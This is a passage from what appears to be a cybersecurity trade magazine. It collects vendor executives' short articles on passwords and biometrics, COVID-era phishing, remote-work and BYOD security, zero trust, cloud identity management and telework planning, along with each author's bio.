After all, it is not easy to memorize the complex passwords as we are using more systems in our routine 

lives. 

It lets us log in to different applications and services with just one single identity. It eliminates the need to 

repeat access to each account each time you get to disconnect from the service. 

However, an SSO service is not immune to some issues such as breakdown and comprised passwords. 

Luckily, these things can be avoided by using strong passwords as well as working with an efficient SSO 

vendor. 




Ayman is founder of cynexlink. When Ayman founded Cynexlink, he 

had one core mission in mind: helping small- and mid-sized companies 

spend more time focusing on their core businesses. Could we impress 

you with his technical background? With his engineering degree from 

Damascus University, as a CCNP, CCVP, CCNA, CCDA, Cisco IPTX 

and VoIP specialist, being MCSE and A+ certified and having nearly 20 

years of experience in enterprise network design and architecture, 

network routing, switching, wireless, security, Cisco Unified messaging, 

CCME, UC500 Series, voice gateway and Cisco Unity – yes, we think 

we could. 

Ayman can be reached online at (aat@cynexlink.com) and at our company website - 

https://www.cynexlink.com 

LinkedIn | Twitter | 949.668.0682 



A Passwordless Future: Will Biometric Identification 

Replace Passwords? 

By Joshua Frisby, Founder of PasswordManagers.co 

From Face ID to scanning your fingerprint to unlock your phone, biometric authentication is weaved into 

almost every device that we rely on. It has been so seamlessly integrated that it has become somewhat 

second-nature in the digitally dominant world that we live in. 

While not needing to enter, or remember, a password is extremely convenient, we must ask: Will 

biometric authentication replace traditional passwords altogether? And most importantly: Is it safe? 

We have become so accustomed to using biometric authentication but the truth is that while biometrics 

offer many advantages, it also comes with several drawbacks. Let’s take a closer look. 

Is There a Need to Replace Passwords? 

Login details and credentials are susceptible to theft and are often targeted by hackers. In fact, Verizon’s 

Data Breach Investigations Report concluded that up to 81% of data breaches are due to hackers being 

able to gain access by leveraging weak, reused, or stolen passwords. With the level of exposure to 

cybercrime dependent on where you reside, having a fool-proof method to login into your accounts is 

crucial to secure digital infrastructures, devices, and identities. 



According to research conducted by LastPass, the average person can have up to 97 work-related 

passwords that they need to manage, and that’s not even including personal ones. It’s no shock that so 

many people reuse the same password, after all, we are only human. Unless you are a genius and have 

the world’s best memory, it’s highly likely that you are going to be able to remember so many, let alone 

come up with complex combinations to ensure you use unique strong passwords for each account. 

With cybercrime on the rise, 55% of people would prefer a method of protecting accounts that don’t 

involve passwords. Enter biometric authentication. 

What Makes Biometrics a Good Alternative? 

Biometric data is unique to you, making it hard to steal and imitate. And so, biometrics are a serious 

contender for replacing passwords as the standard login method. 

Not only are we familiar with using our biometric data (face and fingerprint) to unlock our devices and in 

some cases, a handful of accounts, they also make the login process effortless. There is no need to type 

usernames or long complicated passwords. Take mobile banking apps as an example, what could be 

more convenient than simply scanning your finger on a reader to see your account balance? Or, even 

simpler, look at your phone’s camera to unlock your device via the built-in iris scanner. 

Source: Science Focus 

While convenience is nice to have, security is the primary concern. Because biometrics are more difficult 

to replicate than passwords, hackers cannot obtain your sensitive data with a simple phishing attack. 

This makes hacking data that is protected with biometrics much more difficult than password-protected 

data. 



We’ve touched on face-scanning but it is far more sophisticated than you may think. Facial recognition is 

rapidly gaining popularity and the algorithms that are used to analyze someone’s facial features are also 

becoming increasingly intelligent. For example, some facial recognition applications can differentiate a 

live subject from a picture, making it very difficult to spoof the facial recognition and gain unauthorized 

access to protected data. 

Capital is another driving force behind the development of biometrics. The biometrics market is estimated 

to be worth a staggering $49 billion by 2022 and huge investments are being made in the development 

of new algorithms and systems to improve biometric accuracy. 

Biometric authentication was first introduced to the mass market by smartphones such as the Apple 

iPhone and Samsung’s Galaxy range. Today, it is possible to use biometrics across a much broader 

range of applications. However, biometrics are not limited to devices and software, we can also use them 

to access physical spaces like our homes. This versatility makes for a better overall authentication 

method than passwords, especially when speed, ease of login, and security are all concerns. 

If biometrics are a better authentication method, why are we still using passwords? The answer is that 

biometrics are not perfect and they do have significant drawbacks that need to be addressed before we 

can fully embrace the passwordless revolution. While the technology is very promising and convenient, 

there’s certainly room for improvement before biometrics can claim to enjoy the same popularity that 

passwords do. 

What Are the Drawbacks of Biometric Authentication? 

While biometrics are very secure, they are also immutable. 

It is important to remember that biometric data has to be stored somewhere for applications to use it as 

an authentication method. The problem is that if these databases were to be hacked, your identity could 

become compromised. 

If your biometric data is ever compromised in one way or another, you could face serious repercussions. 

You can change passwords, you can’t change biometrics. 

Since biometrics can’t be changed, it would be impossible to ensure the safety of compromised accounts 

once hacked. This is where passwords have the upper hand. If your password is ever lost or stolen, you 

can simply log in to your account and change your credentials to make it secure again. This process can 

be repeated over and over again. 

Biometric authentication also comes with quite a few privacy concerns. Since biometrics inextricably link 

a user’s digital and physical identity, there are concerns that biometric data could be collected and abused 

by hackers. Since data privacy is a key concern, this could cap how widely biometric authentication is 

accepted as more people become aware of the potential downsides. 



Source: Apple Insider 

It is also important to note that biometric authentication systems have not been around as long as 

password-based systems. Consequently, they suffer from more bugs and growing pains. False positives 

or negatives occur frequently, and this can lead to frustration when an authorized user is denied access 

or, more seriously, when the wrong person is granted access due to a false positive identification. A 

research team from New York University created an artificial intelligence platform that was able to 

successfully recreate full fingerprints from partial prints. The recreated fingerprints were able to fool a 

biometric authentication system 20% of the time. 

Last but not least, biometric authentication systems can often be biased against users who cannot easily 

submit biometrics. This includes handicapped people who may have experienced a change in their 

biometric details due to an injury. For example, a badly cut finger may lead to scarring that makes a 

fingerprint unrecognizable, and as a result, revokes access. 

Passwords Are Here to Stay 

Although the use of passwordless methods are on the rise, it seems that passwords will remain the 

mainstream authentication method for the near future. So, to make using passwords as simple and 

secure as possible, there are a few simple steps you can take. 



The key to having optimal online security is to ensure that all your passwords are unique and complex. 

It’s easy to base your passwords on something that is of personal significance to you such as your 

birthday or the name of a loved one, but this makes passwords easy to guess and is a hacker’s dream. 

Using a password generator to create complex passwords that cannot be guessed with ease is a simple 

and quick way to strengthen the security of your online accounts. But, to take the security of your 

passwords to the next level, you can store them in a fortified password vault cocooned in encryption. 

There’s a wide range of different password managers that can facilitate the secure storage of passwords 

whilst also offering the convenience of auto-filling credentials, making logging into sites as seamless as 

biometric authentication. 

You should also ensure that you never write down your passwords, save them in spreadsheets, or share 

them over text or email. Hackers can easily exploit these unsecure methods. Changing passwords 

frequently also makes your accounts more secure and helps to keep hackers at bay. 

Although biometric authentication doesn’t appear to be replacing passwords in the near future, perhaps 

the best authentication method is a hybrid one in which passwords and biometrics co-exist to deliver a 

comprehensive security solution. 


Joshua Frisby is the Founder of PasswordManagers.co. His mission 

is to help you protect your passwords. Whether you want to securely 

manage passwords for personal, family, or business use, 

PasswordManagers.co is here to help you stay safe. Josh can be 

reached via email or LinkedIn. 



Post COVID-19: Cloud, Remote Work and BYOD Security 

Predictions 

By Anurag Kahol, CTO and co-founder, Bitglass 

Cloud adoption has already been growing rapidly, but we’ll see a sharp increase in adoption in 

2020 as a result of the global pandemic. 

Recent events have impacted businesses and schools all around the world, causing them to shift to 

remote work wherever possible. Cloud adoption gives employees and students the freedom to operate 

from the safety of their homes by granting remote access to needed data and services. However, even 

before the outbreak, cloud adoption was outpacing the adoption of the tools needed to properly protect 

data in cloud environments. In 2019, 86% of organizations deployed cloud-based tools, but a mere 34% 

made use of single sign-on (SSO), a basic but critical capability for authenticating users and securing 

access to corporate cloud environments. This statistic suggests deeper underlying cloud security issues 

within organizations and indicates that data breaches will continue to arise around the world. 

The shift to widespread remote work also increases the likelihood of insider threats. 

Verizon’s 2019 Data Breach Investigation Report found that approximately 34% of breaches involved 

internal actors. Additionally, a recent survey conducted on IT professionals about insider threats revealed 

that only half of organizations provide user training regarding insider threats. While protecting data from 

malicious external actors is typically top of mind for most organizations, the fact remains that they must 

also defend against employees--whether they are malicious or merely careless. 



Phishing attacks are not a groundbreaking threat, and general employee awareness of these schemes 

has grown in recent years; however, hackers still find success with this tactic by taking advantage of 

major news. In fact, the United Nations' health agency released an alert warning of an increased number 

of cybercriminals posing as World Health Organization (WHO) representatives amid the current 

pandemic. During this stressful time, recipients of these messages are more likely to click on malicious 

URLs, open attachments, and give up personal data. Because of this, insider threats will spike and be a 

leading cause of data breaches in 2020. 

Businesses will implement changes to ensure BYOD devices are secure. 

A majority of organizations (85%) were already somewhat prepared for remote work by enabling bring 

your own device (BYOD) policies. On the flipside, not all companies that have adopted BYOD are doing 

so securely. For example, 43% of businesses do not know if the devices employees are using to access 

corporate data are infected with malware--demonstrating a disturbing lack of visibility. By the end of 2020, 

we will likely see even higher BYOD adoption rates--whether out of necessity for enabling remote work, 

or simply for BYOD’s many benefits, including enhanced mobility, efficiency, and employee satisfaction. 

Regardless, when companies enable BYOD, they must also implement agentless security measures that 

can protect corporate data on personal devices. With agentless tools, IT gains security and compliance 

without invading user privacy through agents on employees’ personal endpoints. As organizations 

increasingly realize that cybersecurity must be a top priority, we predict that the use of agentless security 

solutions will rise alongside that of BYOD. 


Anurag is the CTO and co-founder of Bitglass where he 

expedites the company’s technology direction and 

architecture. Anurag was director of engineering in Juniper 

Networks’ Security Business Unit before co-founding Bitglass. 

Anurag received a global education, earning an M.S. in 

computer science from Colorado State University, and a B.S. 

in computer science from the Motilal Nehru National Institute 

Of Technology. 



The Rise of COVID-19 Phishing Attacks: How Cyber 

Adversaries Are Adopting Phishing to Generate New 

Threat Vectors 

By Brad Slavin, CEO of DuoCircle LLC 

While COVID-19 has locked all people in their homes, with office premises closed, cyber adversaries 

seem to have a field day using the pandemic as a launchpad for phishing attacks. Organizations and 

individuals must be aware of the detective, preventive, and protective measures to safeguard their 

information assets against these attacks. 

As the COVID-19 pandemic assumes global proportions, it is natural for people to become anxious. 

People naturally turn to the internet to acquire the latest information on the coronavirus related drugs, 

vaccines, etc. At the same time, social engineering attacks have been on the rise as malicious actors 

worldwide keep developing sophisticated tools and techniques to entice employees as well as individuals 

to reveal sensitive and confidential information, such as personally identifiable information (PII), financial 

data, or user account credentials. Let's dive deep into the gravity of the situation before discussing what 

the best anti-phishing solutions and techniques are that organizations and individuals can make use of. 

Some Hard Facts and Statistics on Phishing Attacks Based On COVID-19 

Researchers reveal that cybercriminals are primarily employing three ingenious phishing attack 

methodologies to target victims. They are brand impersonation, scamming, and business email 

compromise (BEC). Here are a few spine-chilling statistics on COVID-19 phishing scams that have made 

headlines around the world. 



• There has been an unprecedented rise in phishing scams with more than 854,000 confirmed 

phishing and counterfeit web-pages reported in Q1 of 2020. Besides, more than 4 million pages 

fall in the category of suspicious pages. 

• The alarming issue is that nearly 30% of these confirmed phishing pages (approximately more 

than a quarter of a million) pertain to COVID-19 alone. 

• Though the first COVID-19 related phishing scam surfaced by the end of January 2020, the figure 

for March 2020 alone is 9,116, a 667% increase over February 2020. 

• Eighteen million malware and phishing emails and more than 240 million COVID-19-related spam 

email messages are sent over Gmail daily. 

• Citizens in the US have lost somewhere around $12 million to coronavirus phishing attacks. And 

in the UK, it's over £2 million. 

Healthcare - The Most Vulnerable Industry Domain to Phishing Attacks 

COVID-19 has kept the entire world on tenterhooks. The FUD (the fear, uncertainty, and doubt) and the 

non-availability of a reliable cure or vaccine is the primary reason for the panic created in people's minds. 

Thus, when they encounter an email message seemingly originating from an influential source like the 

US Center for Disease Control and Prevention, WHO, or other prominent health agencies, people rarely 

check their authenticity. Recently, there has been a surge of phishing emails sent by these malicious 

actors impersonating healthcare professionals and organizations, making healthcare one of the most 

vulnerable sectors in coronavirus times. 

Offer for Loans and Grants - The Most Effective COVID-19 Phishing Attack 

The pandemic has thrown the world economy in disarray. It has affected almost every segment of society. 

Under these circumstances, people eagerly look forward to Governmental aid such as EMI moratoriums, 

loans, and other giveaways. Malicious actors have been taking advantage of these situations and are 

trying to lure people to fictitious websites, where the unsuspecting users end up providing vital information 

leading to severe data breaches. These attacks are seen in the form of phishing emails, ransomware, or 

banking malware attacks. 



Donation Solicitations - The Most Dangerous COVID-19 Phishing Scam 

Global pandemics like COVID-19 bring out the humanitarian side of people in a substantial way. 

Generally, people donate generously towards their respective National Disaster Relief Funds, and 

research funds set up by their governments. There have been numerous incidents of cybercriminals 

taking advantage of such philanthropic activities. One of the most notorious modus operandi is to design 

fundraising pages that not only mislead users into donating money but also steal sensitive personal 

information. Using such information, like names, email addresses, phone numbers, credit card details, 

and internet banking usernames and passwords, these malicious actors accept money using the names 

of disaster relief funds. 

COVID-19 Vaccine and Cure Scam - The Most Ingenious COVID-19 Phishing Attack 

While researchers are struggling to find an antidote for the coronavirus, numerous fake websites 

advertising medicines and vaccines have sprung up on the internet. More than 20,000 new COVID-19- 

related domains have been registered in the past few weeks. These websites also claim to sell COVID- 

19 personal protective kits like face masks, sanitizers, hand gloves, medical combinations like 

Hydroxychloroquine, Remdesivir, and so on. Such fraudulent websites ask for the full payment in 

advance and unsuspecting people end up parting with their money only to discover that they have been 

a victim of cybercrime. Amazon itself reported over a million fake products in this category over the past 

couple of months. 

Detective, Preventive and Protective Measures Individuals & Enterprises Can Adopt 

Cybercriminals play on the psychology of the victim by pushing in email messages with COVID-19 related 

information that come along with a malicious attachment or infectious URL. Knowing some of these 

threats could be the best defense in thwarting such attempts: 

• Reliance on Trusted Sources: Rely on authentic or official websites to get reliable information and 

updates about the coronavirus. Be scrupulous in clicking on the links provided on articles and 

blogs that share information on COVID-19. 

• Refrain from The Temptation To Click/Download: Sometimes, ignoring unsolicited emails is the 

best phishing prevention method. Downloading or opening malicious attachments or clicking on 

an infectious URL allows malicious actors to gain access to network systems. 

• Knowing the Phishing Techniques: The latest tactic deployed by malicious actors is to set up live 

tracker websites from which people can purportedly get live coronavirus updates. Though the 

websites appear legitimate, they are scamming attempts that end up with the user compromising 

their confidential information. 

• Phishing Protection Solutions: The best way to deal with phishing threats is to install a trusted 

anti-phishing solution to thwart any attempt made by adversaries. 



• Phishing Awareness: Phishing awareness training plays an integral part in safeguarding 

information assets. Enterprises should educate and train their employees, customers, and thirdparty 

vendors on types of phishing, anti-phishing techniques, and phishing prevention best 

practices, etc. 

Post COVID-19 – What Does the Future Look Like? 

With the lockdown restrictions in place almost everywhere, a significant proportion of people already have 

their presence online, from shopping, ordering food, and essential items to work from home. The shift to 

a virtual workplace has become more pronounced than before, as a majority of online businesses are 

already allowing their employees to WFH, which are likely to follow suit post COVID-19 as well, 

considering the numerous benefits and overall increase in the productivity of the employees. 

As a downside, though, cyber adversaries have seized the opportunity to target as many people as 

possible. Hence, one can expect a surge in phishing attacks and scams in times to come. Therefore, one 

should exercise extreme caution and neutralize the vulnerabilities to mitigate the information risks 

encountered because of COVID-19. Deploying an effective anti-phishing solution is the need of the hour 

to tackle these attacks better, and has never been so significant. 


Brad Slavin,CEO of DuoCircle LLC. Brad Slavin is a security 

industry veteran and the General Manager at DuoCircle LLC a cloud 

email security firm. Before joining DuoCircle, Brad began his career 

in network security by founding a regional ISP in California and was 

the cofounder of wireless wardriving and security software 

Netstumber.com; Which was the recipient of the "Editor's Choice" - 

Laptop Magazine & Ziff-Davis i3 Award for innovation. 

Brad can be reached online at https://www.linkedin.com/in/bradslavin/ and our company website 

https://www.phishprotecion.com 



Post COVID-19: Password Extinction Accelerated; 

Telemedicine Spurs Fraud 

By Robert Prigge, CEO of Jumio 

Passwords will become extinct much faster than predicted. 

As the COVID-19 pandemic pushed more of us to self-isolate, Zoom became the go-to teleconferencing 

platform. In fact, Zoom went from 10 million daily meetings in December to 300 million today. 

Unfortunately, this surge in popularity came with a price tag — a lack of data privacy. Now, there are over 

500,000+ stolen Zoom logins floating around the dark web for just .002 cents each. And this is just 

opening the door for account takeover (ATO) attacks via credential stuffing — a type of cyberattack where 

automated bots use those stolen account credentials to gain unauthorized access to user accounts. And 

Zoom is not alone. We’ve also seen a rash of account takeover attempts aimed at users of Microsoft’s 

proprietary Remote Desktop Protocol (RDP), striking millions per week. 

With data collected and sold on the dark web containing usernames and passwords from past breaches, 

and internet users often recycling the same login credentials across multiple platforms, cybercriminals 

have all of the tools they need to impersonate a user’s identity online. This means that if your online 

account is only protected by a username and password, then you’re likely going to be an ATO target. As 

a result, password-based authentication, multi-factor authentication (2FA) and knowledge-based 

authentication (KBA) will be a thing of the past much sooner than previously anticipated, and businesses 

will look to more sophisticated and secure login options for current and prospective users. 



Telemedicine will open up new threat vectors for fraud. 

Given the health concerns involved with physically visiting a doctor or hospital during COVID-19, patients 

have been urged to stay home unless symptoms are considered severe. Because of this, telemedicine 

has been the most viable resource for those seeking medical counsel during this time. Unfortunately 

there have also been over 3,000 healthcare-related breaches that have impacted more than 500 million 

medical records in the past decade, a trend that has been escalating year-over-year. Due to the high 

amount of personal information, medical records command a high value on the dark web and can be 

listed for up to $1,000 each, 10 times more than the average credit card data breach record. 

Cybercriminals can then easily obtain this information and impersonate legitimate patients. 

This stolen information can also be used to obtain free medical or dental care. Because of this, CIOs will 

scramble to ensure procedures are in place so that doctors know their patients are who they say they are 

—and this is the domain of the emerging field of Know Your Patient (KYP). This means healthcare 

provider organizations need to adopt identity safeguards similar to the Know Your Customer (KYC) 

regulations adopted by the financial service industry. 


Robert Prigge is responsible for all aspects of Jumio’s business and 

strategy. Specializing in security and enterprise business, he held C-level 

or senior management positions at Infrascale, Secure Computing, 

McAfee, Quest Software, Sterling Commerce and IBM. Robert can be 

reached online via LinkedIn, on Twitter @rprigge and at Jumio’s website, 

www.jumio.com. 



The Future Of Security – Predictions Post COVID-19 

By Mike Riemer, Pulse Secure, Global Chief Security Architect 

The Future of Work post COVID-19 - Larger Remote Workforce with Cybersecurity Built into the 

Culture 

“A recent Gartner survey of over 300 CFO’s found that 74% of respondents say they expect to move 

previously on-site employees to remote post-COVID-19. As such, a large remote workforce is forcing 

companies to re-evaluate how to evolved their corporate culture and invest in capital. Embedding a longterm 

cybersecurity strategy as part of this evolution to keep workers safe will be critical. 

Ultimately, an effective security culture mitigates the risk of a breach as a result of credential theft, 

phishing and business email compromise (BEC) – and working with employees to protect their privacy 

addresses a growing issue for many people, 28% of whom have had their identity hacked or stolen. That 

number increases to 35% when looking at the entire U.S. 

However, as businesses are quick to ditch their office spaces, they will need to allow employees to have 

secure remote access to corporate systems as well as implement Zero Trust. Zero Trust is an approach 

based on the concept of continuous verification and authorization. It ensures that only authenticated 

users with compliant devices, whether corporate, personal or public, can connect to authorized 

applications over any network, whether on-premises or in the cloud. This will help remote workers to 

engender more confidence that their business and personal data is secure. “ 

Zero Trust Must be Part of the Future of Work During and Post COVID-19 

“The need for Zero Trust security has never been greater, especially due to increased targeted attacks, 

rapid work from home mandates, and mounting privacy compliance obligations due to COVID-19. As 

such, enterprise adoption of the Zero Trust security model is growing as mobility and hybrid IT models 



have placed most workloads beyond the shelter of corporate networks and traditional perimeter defense. 

This creates significant user access and data concerns. 

The 2020 Zero Trust Progress Report by Pulse Secure revealed that nearly a third of cybersecurity 

professionals have expressed value in applying Zero Trust to address hybrid IT security issues. This 

report, which surveyed more than 400 cyber security decision makers, found that 72% of organizations 

plan to assess or implement Zero Trust capabilities in some capacity in 2020 to mitigate growing cyber 

risk, while nearly half (47%) of cyber security professionals lack confidence applying a Zero Trust model 

to their Secure Access architecture. 

With its principle of user, device and infrastructure verification before granting conditional access based 

on least privilege, Zero Trust holds the promise of vastly enhanced usability, data protection and 

governance and must be part of any security architecture as we navigate the current COVID-19 business 

landscape.” 

Telemedicine and Remote Field Offices are Changing the Needs of Healthcare Professionals 

“Healthcare is going the way of other industries with employees being asked to work remotely and post 

COVID-19, we believe the use of telemedicine and remote field offices will be the new normal in 

healthcare. 

As such, IT teams must provide healthcare workers with mobile devices that are protected, even on 

expanded Wi-Fi networks or cellular networks as employees are often working outside secure networks, 

opening their mobile devices to additional threats. 

Increasing remote capacity on network protections such as VPNs, extends security to those workers in 

the field, ensuring that both patient information as well as other personal information stored on those 

devices is safe. By deploying Zero Trust policies, info security teams can also implement fine-tuned user 

access management to ensure that network capacity is maximized and that workers only have access to 

the information that’s absolutely necessary.” 


Mike Riemer is the Global Chief Security Architect for Pulse Secure, where 

he has worked for the last six years. He has over 37 years of IT and IT 

Security experience and is a Certified Instructor on Firewall/Virtual Private 

Networking, Intrusion Detection/Prevention, SSL/VPN and Network Access 

Control disciplines. He previously spent 25 years with the U.S. Air Force 

working in Cyber Security and Intelligence. 



Post COVID-19 Cybersecurity and Future-of-Work 

Predictions 

By DivvyCloud by Rapid7, Chris DeRamus, VP of Technology, Cloud Security Practice 

Remote work is here to stay: 

“Some organizations (including DivvyCloud) preferred coming into the office for work prior to the 

pandemic because we enjoyed the sense of community. But, the current situation has changed our 

outlook on remote work, and the same is true for many organizations around the world. Many companies 

are quickly realizing their employees are just as productive working from home through cloud apps and 

services as they are in the office space. In fact, in many cases employees are even more productive 

because they don’t waste time commuting. As such, we should expect plenty of organizations to transition 

to more frequent (or even permanent) remote work models once stay-at-home orders have been lifted. 

Organizations may even reduce or eliminate office spaces to cut back on overhead costs , especially 

those looking to climb out of economic hardship caused by the pandemic.” 

To support remote work, organizations will need to prioritize cloud spend: 

“Organizations have been spending more on cloud infrastructure to support their remote workforces. 

Increased demand spurred AWS’ sales to surpass $10 billion this past quarter and Azure is running out 

of capacity in some regions. As a result, organizations will need to “tighten the operational belt” from a 

budget perspective and ensure that the proper security and governance controls, virtual desktop 

infrastructure (VDIs), and other key instances are implemented. 



For DivvyCloud and plenty of other organizations, real-time communications platforms like Slack and 

Teams have been invaluable for navigating the work-from-home experience, and we can expect to see 

a heightened demand for these tools even once this pandemic subsides. Additionally, organizations will 

need to focus on identity and access management in their cloud infrastructure. This will ensure 

employees are able to securely access the tools and resources they need to do their jobs while thwarting 

fraudulent unauthorized attempts from bad actors.” 

Choosing between security and innovation in the cloud will continue to be a common, avoidable 

pitfall: 

“Nearly 50% of developers and engineers bypass cloud security and compliance policies and just 58% 

of organizations have clear guidelines for developers building applications in the public cloud. Developers 

work hard and fast to deploy new features and services to meet market demands, but without the proper 

guardrails in place, this can lead to misconfigured cloud instances, severe security flaws, and more. 

In fact, in early April, it became publicly known that Zoom’s engineers bypassed common security 

features, such as not requiring users to add unique file names before saving their videos. While this 

allowed Zoom to support its exponential jump in demand (from 10 million daily users in December 2019 

to over 200 million in March 2020), it also resulted in errors such as thousands of users’ videos being 

made publicly accessible on unprotected Amazon buckets. This news added to a string of other privacy 

concerns around Zoom. DevOps and security must be completely in sync to avoid similar pitfalls. 

Engineers will begin to tackle cloud security flaws earlier in the build pipeline: 

“Security and compliance practices have been mainly reactive, with teams scrambling to catch 

security/compliance flaws after cloud resources are built. But as anyone in that position can attest, there’s 

no putting the genie back in the lamp. Instead, engineers will need to focus on how “to-be-built” 

infrastructure or changes will affect the security and compliance of their cloud footprint while they are still 

in the continuous integration/continuous deployment pipeline. 

For example, Zoom’s CEO pledged to shift the company’s engineering resources to proactively address 

issues with measures such as a third-party review of changes before they’re made, white box pen tests 

to further identify and address issues, and upgrading Zoom’s encryption scheme to AES 256-bit GCM 

encryption. Other organizations will leverage capabilities such as Infrastructure as Code security to build 

a virtual data model of what would have been built and either affirm or deny the compliance of proposed 

changes while also warning engineers of potential violations, thus giving them the opportunity to learn 

from the experience and incorporate learnings into future projects.” 

IAM is (and will continue to be) the primary perimeter in cloud security: 

“All users, apps, services, and systems in the cloud have an identity, and as organizations shifted to 

remote styles of work, they quickly learned that these relationships are complex. Understanding the full 



picture of access in the cloud and working toward least privileged access are difficult , but necessary 

endeavors to ensure security in the cloud. In the last couple months, plenty of enterprise security 

professionals have realized that cloud identity and access management (IAM) is an area where they are 

vulnerable because they lack insight into the complex problem. 

The repercussions of poor IAM governance are substantial and sometimes unpredictable. For example, 

last year a former AWS employee accessed over 100 million Capital One customers’ records after she 

bypassed a misconfigured web application firewall, then used privileged escalation to access the data. 

To protect the identity perimeter at scale, organizations need an automated monitoring and remediation 

solution for access management, role management, identity authentication and compliance auditing – all 

of which help enterprise security teams stay ahead in this complex landscape. Even once this pandemic 

subsides, we will continue to see a great emphasis placed on cloud IAM, especially as organizations 

continue to encourage remote work.” 


Chris is the VP of Technology, Cloud Security Practice at DivvyCloud 

by Rapid7. He is a technical pioneer whose passion is finding 

innovative and elegant new ways to deliver security, compliance and 

governance to customers running at scale in hybrid cloud 

environments. He remains deeply technical, writing code and diving 

into the latest technologies and services being deployed by partners 

like Amazon, Microsoft, Google, VMware, and OpenStack. 

Before co-founding DivvyCloud, Chris was the Online Operations 

Manager at Electronic Arts for the Mythic Studio where he helped 

design, build and operate large scale cloud infrastructure spanning public and private clouds to run 

Electronic Art’s largest online games (including Warhammer Online: Wrath of Heroes and Warhammer 

Online: Age of Reckoning). He started his career as a Network & System Administrator at the U.S. 

Department of Energy where he was mandated with a broad array of technical responsibilities including 

security and compliance. 

Chris earned his Bachelor of Business Administration in Computer Information Systems from James 

Madison University. 



Building A Telework Health Scorecard To Meet Surge 

Requirements And Long-Term Resiliency 

By Stan Lowe, Global Chief Information Security Officer, Zscaler 

Over the past months, the U.S. Federal government has deployed solutions to keep employees 

productive and secure from any location, including at home. The initial rapid response typically included 

increasing capacity, deploying new remote access options, and enhancing security measures. 

As CIOs and CISOs move forward from the initial crisis mode, they now need to take a harder look at the 

systems in place – what is working and what is needed. But, to get the right answers, we have to ask 

the right questions. 

There are different sets of considerations and evaluation questions to ask in initial crisis phases vs. in 

steady-state environments. IT leaders can build customized telework health scorecards for these two 

phases to provide a comprehensive view and then prioritize the next steps. 

Initial Crisis Telework Health Evaluation Criteria 

1. What do we need to do? Prioritize the most important tasks. Then, consider the resources users 

will need and what can be postponed or cut altogether. 

2. Who needs access, when? Consider the access policies needed to align access with mission 

priorities. Do all employees need to have always-on connectivity? What work requires only occasional 



connectivity? To ensure comprehensive, secure access, agencies may initially need to take a “tiered” 

connectivity approach. 

3. How can employees connect? Some employees may have had government-issued laptops and 

devices prior to the crisis, but do all employees now need laptops? Prioritize needs. Then, evaluate 

risks and develop BYOD policies and education. 

4. Can we stagger work hours? It may not be possible to accommodate an almost entirely remote 

workforce within the typical 9-5 hours. Some agencies can adjust work hours, moving mission critical 

work to the “graveyard-shift” hours to ensure seamless connectivity to perform critical duties. 

5. How do we improve performance/connection speed? As the network perimeter expands, many 

agencies are moving to the cloud through a secure access service edge (SASE) model. Direct access 

via internet breakouts provides fast, secure access for all users. 

What’s Next? Evaluating and Evolving Telework Health for the Long Haul 

Once mission critical teams are operational in remote environments and the organization has moved past 

that initial crisis response – the next step is to take the lessons learned and evaluate how to continue 

down the modernization path. What will drive simplicity, reduce costs, and create scalability for any future 

COOP scenarios? 

This is not a one-and-done process but should be built into ongoing IT operations and planning. 

Here are six design architecture questions to help frame telework health – with the goal of driving digital 

transformation and improve security, access, and support for remote employees: 

1. Do we provide a seamless user experience with direct access to internal and external 

applications? 

Agencies need to adjust security from traditional, legacy appliance-based tools, such as VPNs, to a 

solution that secures traffic no matter where the user or target application resides. Zero trust connections 

allow users to directly access applications in any location. This eliminates the hair-pinning caused by 

backhauling traffic through a VPN, reduces traffic, and reduces latency – ultimately, improving the user 

experience. Zero trust also never puts users on the network, reducing the attack surface. 

2. Do we have context-aware access? 

Users should only be given access to resources and applications necessary for their job functions. 

Agencies should develop clear access policies and rules enforced through a zero trust security model, 

where only authorized users will be granted access to authorized applications. This can further limit eastwest 

traffic on the network so that users will not reach applications they were not intended to reach. 

Context-aware access also delivers benefits beyond work-from-home security, such as mergers and 

acquisitions, cloud migration, third-party access, and more. Zero trust network access solutions address 

all of these scenarios with simple policies that are user-centric, rather than network-centric. 



3. Are we enabling flexible deployment for instant and seamless expansion? 

A cloud-based zero trust service can provide a scalable environment without placing a significant burden 

on the IT team. Agencies can start with an initial use case and transition from broad policies to more 

granular and specific policies as they go. And, many Federal agencies already have elements of zero 

trust in their infrastructure, such as endpoint management, Continuous Diagnostics and Mitigation, 

software-defined networking, micro-segmentation, and cloud monitoring. Once zero trust access is fully 

operational, decommission VPN access for the group, then iterate as necessary. 

4. How are we providing comprehensive visibility and troubleshooting that enables rapid userissue 

resolution? 

In a legacy environment, you can’t protect what you don’t know is there. A disadvantage of legacy 

solutions is that data is often distributed across the environment, and agencies often use complex tools 

with multiple interfaces, methodologies, and terminologies. This creates a higher likelihood that bad 

actors could be hiding in the background, hoping to be overlooked. Zero trust provides IT administrators 

with a single pane of glass view to manage, administer, and log users in one place. Administrators will 

have full visibility and control into the distributed environment. 

5. How do we reduce security and remote access infrastructure maintenance requirements? 

Appliance-based remote access solutions constantly need updates on firmware, software, security, and 

policies to keep up-to-date with technology and advancing security risks. A cloud Software-as-a-Service 

model greatly reduces management and upkeep. This can free up time for agencies to focus on more 

critical mission needs along with improving their policies, instead of patching security holes. 

6. What will ensure scalability for future COOP scenarios? 

Legacy remote access solutions, such as VPNs, may require adjustments to bandwidth, throughput, or 

additional technology adoption to scale to meet operational needs. Many agencies’ initial reactions to 

the current crisis have been to grow capacity by implementing new infrastructure or adding new 

appliances. But, a cloud-native capability is the only solution that can easily scale up and down as 

needed when future COOP scenarios arise. 

Cloud-delivered zero trust SASE models will transition security from network-centric controls and remote 

network connectivity to user-centric and application-centric security, designed to support highly 

distributed teams working beyond the traditional network perimeter. 

One thing we’ve learned from these past months is that every agency needs a systematic process to 

evaluate telework health. These questions and review processes will create a stronger, more resilient 

government that can keep employees safe, productive, and focused on delivering citizen services. 




Stan Lowe,Global Chief Information Security Officer.Stan 

Lowe, a cybersecurity and technology executive, has 

successfully led transformational change in large, complex 

environments, as well as small and mid-size cybersecurity 

and IT organizations. 

As Zscaler Global Chief Information Security Officer, Stan 

oversees the security of the Zscaler enterprise and works with the product and operations groups to 

ensure that Zscaler products and services are secure. Part of his focus is to work with customers to help 

them fully utilize Zscaler services and realize the maximum return on their investment. 

Prior to joining Zscaler, Stan served as the VP & Global Chief Information Security Officer for 

PerkinElmer, where he was responsible for global enterprise security and privacy. He has also been a 

Cyber Security Principal at Booz Allen Hamilton. 

Stan has extensive federal experience, serving as the U.S. Department of Veterans Affairs (VA) Deputy 

Assistant Secretary for Information Security, Chief Information Security Officer, and Deputy Chief Privacy 

